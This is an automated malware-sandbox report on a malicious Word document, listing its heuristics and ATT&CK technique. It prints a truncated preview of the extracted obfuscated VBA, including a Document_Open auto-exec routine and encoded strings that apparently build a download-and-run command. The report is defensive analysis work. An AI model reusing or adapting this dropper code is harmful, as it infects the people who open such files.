MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains VBA macros, including a Document_Open auto-execution macro, which utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions or the exact payload it attempts to execute.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34824 bytes |
SHA-256: 2ebefddc1ec81af3348e97f6106617da6a73af94064ab4dfe41137cf82bb1f50 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iIhbMGSuKA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub tBMVq(jSCVIz)
XUdbKM = 88208 * ZNEEwM + 37002 * ChrB(87053 * Rnd(72387) - 769 + vGddwM) - 71946 - Rnd(ZzrpsM) + 32338 - ETGFsq * 57299 * Chr(oIQtR)
End Sub
Sub ZRVdD(urhPYi)
siYMs = 61730 * OZfum + 8887 * ChrB(56060 * Rnd(17169) - 77814 + vsQMaa) - 38242 - Rnd(IbwNm) + 82338 - NWlmQv * 45622 * Chr(wwzma)
zMlCtT = 63015 * HRIEw + 69845 * ChrB(9457 * Rnd(48118) - 2290 + oNYhrW) - 46360 - Rnd(YiUObo) + 87210 - JOKKt * 44080 * Chr(zPUdM)
nIXzLz = 24647 * RUOiB + 91970 * ChrB(3566 * Rnd(87462) - 87201 + UKbbqO) - 81161 - Rnd(RNYSXs) + 23206 - kWzQPq * 62569 * Chr(rtvjs)
End Sub
Sub wGVdJB(MSIHR)
zuwzWS = 11546 * fwcad + 58528 * ChrB(46354 * Rnd(67575) - 93097 + JCqPS) - 94057 - Rnd(jKZYEo) + 19060 - KhJtwZ * 27273 * Chr(PTKtCj)
zdVpz = 30149 * jcBDnH + 62358 * ChrB(74565 * Rnd(51277) - 15298 + dTzOp) - 99925 - Rnd(vQawID) + 82321 - ocviw * 24097 * Chr(Uzhrsm)
End Sub
Private Sub Document_open()
On Error Resume Next
FdsCa = 49372 * ZinVw + 3672 * ChrB(99328 * Rnd(30041) - 76276 + wMkTE) - 83728 - Rnd(JFvzzh) + 95599 - GoKzD * 11711 * Chr(RqOtHN)
AsXQJUXjIkbz (KiEJN + CiBZsEbvdCSIDf + jCnBlA)
UiNZAp = 28077 * NpSjNV + 91640 * ChrB(88867 * Rnd(8069) - 20235 + iHvNup) - 39370 - Rnd(bEAIL) + 6210 - Hmcps * 34487 * Chr(MzsmZz)
End Sub
Sub kIjqB(lZRSj)
lnkMjG = 62663 * NIRPR + 34388 * ChrB(61519 * Rnd(89057) - 96068 + IQVfq) - 93389 - Rnd(RJhbh) + 41672 - FMjLb * 71263 * Chr(ftwKb)
UZjqrb = 94242 * TLGwo + 90412 * ChrB(27707 * Rnd(94399) - 98855 + jnHJF) - 72826 - Rnd(SMHdW) + 42773 - PFwsZ * 82926 * Chr(GYAlBZ)
nqwit = 50105 * ojKUwV + 48106 * ChrB(28414 * Rnd(79659) - 61347 + plhiwV) - 44749 - Rnd(oZOGY) + 7695 - GiWJv * 55374 * Chr(raWmYb)
End Sub
Sub LrjUo(ojFrc)
llEZd = 73324 * lOurj + 70050 * ChrB(38869 * Rnd(86238) - 88512 + LLzvm) - 55922 - Rnd(fljrXa) + 48247 - jkrKmA * 87216 * Chr(IpHQz)
End Sub
Sub kUTuY(jfPzIW)
rCYOnV = 24954 * zdiHGS + 22164 * ChrB(77774 * Rnd(10863) - 58621 + icAPY) - 55654 - Rnd(fwBVr) + 3913 - FBzkb * 38914 * Chr(mEkrln)
bUrJU = 93020 * Sqmzll + 80768 * ChrB(27289 * Rnd(95417) - 58838 + jrAQNE) - 57901 - Rnd(QwXQY) + 75856 - jEiKLW * 10893 * Chr(nKLkqi)
End Sub
Attribute VB_Name = "YGGFEvR"
Sub HmfKf(uaOMvB)
knTOaO = 26343 * CTnbL + 45510 * ChrB(33406 * Rnd(19385) - 35465 + tStXXf) - 23449 - Rnd(lsjzY) + 89589 - ToTnri * 64311 * Chr(EETri)
End Sub
Function CiBZsEbvdCSIDf()
On Error Resume Next
SqduV = 89205 * zfKVX + 50020 * ChrB(81220 * Rnd(55349) - 64907 + JpHKrn) - 95301 - Rnd(iRnpiz) + 5964 - zvuzQ * 80360 * Chr(HXYiK)
aFTnA = qUlzZX("nZ'DHbJ+HbJleTd7(5WHbJ+HbJaasfcHbJ+HbJ'+'.HbJ+HbJTd'+'7ToStrHbJ+HbJmWDHbJ+HbJimWDNHbJ+HbJgTdHbJ+Hb'+'J7(),HbJ+HbJ 5WaSDC);HbJ+HbpQoz%i", AzbIi - AzbIi + 3 + AzbIi - AzbIi, AzbIi - AzbIi + 126 + AzbIi - AzbIi)
KliEO = 1464 * azaDj + 8697 * ChrB(75662 * Rnd(55665) - 57658 + AKSUa) - 89453 - Rnd(jiUZAn) + 37014 - noYjF * 71116 * Chr(zmcAU)
omMzta = 58078 * RjIUkR + 59217 * ChrB(46009 * Rnd(92803) - 29130 + DrzzBb) - 53598 - Rnd(NillmS) + 52756 - XFLIj * 70635 * Chr(mHDzM)
GmNFtHYhYjk = qUlzZX("SuYOYvHbJ'+'ch(5WHbJ+HbJaaHbJ+HbJsfc 'ocq", RMCmdP - RMCmdP + 7 + RMCmdP - RMCmdP, RMCmdP - RMCmdP + 32 + RMCmdP - RMCmdP)
vjXrZp = 86011 * mKWRlR + 29069 * ChrB(60480 * Rnd(90055) - 40714 + IQHSk) - 13706 - Rnd(SkNszi) + 29017 - RwOuNd * 66745 * Chr(kupqz)
SzUhqw = 56592 * fSQSoM + 63126 * ChrB(7154 * Rnd(23772) - 77523 + rpiMOZ) - 68241 - Rnd(vtzrCW) + 94671 - fzjCs * 80152 * Chr(svFwK)
KVkQWENmzMB = qUlzZX("CIOztHbJ+HbJ;5WHbJ+HbJaNSB = 5WansauSRrI", rGMiv - rGMiv + 5 + rGMiv - rGMiv, rGMiv - rGMiv + 31 + rGMiv - rGMiv)
KMJuBw = 77585 * mGHGKh + 81933 * ChrB(64781 * Rnd(51778) - 27066 + qHBDcl) - 88061 - Rnd(jqQJd) + 48873 - khnwAX * 17092 * Chr(stbvi)
LmMDbv = 66490 * OFpAV + 754 * ChrB(52877 * Rnd(51851) - 51095 + vXVNw) - 38000 - Rnd(nzpUdz) + 1473
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.